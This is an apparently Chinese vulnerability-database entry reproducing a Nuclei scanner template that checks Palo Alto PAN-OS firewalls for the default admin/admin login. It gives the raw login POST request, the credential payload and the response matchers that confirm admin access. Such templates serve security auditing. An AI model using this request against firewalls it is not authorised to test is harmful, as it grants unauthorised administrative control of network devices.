漏洞描述
Palo Alto Networks PAN-OS application default admin credentials were discovered.
panos-default-login: Palo Alto Networks PAN-OS Default Login
PoC代码[已公开]
id: panos-default-login
info:
name: Palo Alto Networks PAN-OS Default Login
author: Techryptic (@Tech)
severity: high
description: Palo Alto Networks PAN-OS application default admin credentials were discovered.
reference:
- https://docs.paloaltonetworks.com/pan-os/8-1/pan-os-admin/getting-started/integrate-the-firewall-into-your-management-network/perform-initial-configuration.html#:~:text=By%20default%2C%20the%20firewall%20has,with%20other%20firewall%20configuration%20tasks.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
cvss-score: 8.3
cwe-id: CWE-522
metadata:
max-request: 1
tags: panos,default-login,vuln
http:
- raw:
- |
POST /php/login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
user={{username}}&passwd={{password}}&challengePwd=&ok=Login
attack: pitchfork
payloads:
username:
- admin
password:
- admin
matchers-condition: and
matchers:
- type: word
part: header
words:
- "Set-Cookie: PHPSESSID"
- type: word
words:
- "Warning: Your device is still configured with the default admin"
- type: status
status:
- 200
# digest: 4b0a00483046022100a9a96d6c71952fdc073cdc5910aa6c48e66d5736168f3d736dcb293dee7719ba022100c6a18b3a98092df15a556c3793e35bc5164e4205f3c76ccacff090aabfcc2d6d:922c64590222798bb761d5b6d8e72950